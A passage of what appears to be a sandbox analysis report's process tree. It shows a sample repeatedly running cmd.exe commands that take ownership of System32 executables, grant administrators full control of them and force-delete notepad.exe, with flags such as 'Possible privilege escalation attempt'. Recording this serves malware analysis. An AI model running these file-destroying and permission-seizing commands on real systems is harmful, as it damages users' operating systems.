      PID:6900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4536
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5092
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8008
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1868
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6776
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7364
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7148
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7104
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5752
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3548
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4056
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2668
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4644
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:460
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:6880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5000
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:7924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5332
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5296
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5132
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4976
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5948
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:6560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7460
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2404
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5632
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5500
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7876
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4816
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4832
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5548
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5004
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4252
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6908
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5620
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7976
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1652
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7396
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2948
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7848
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5784
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7408
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6320
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2132
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7076
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1944
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3004
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5420
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\cmd.exe" /grant administrators:F"
    3⤵
    PID:2812
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8004
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2616
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3544
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5220
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2424
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\cmd.exe" /grant administrators:F"
    3⤵
    PID:2572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1872
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5092
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5060
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1472
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1868
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6388
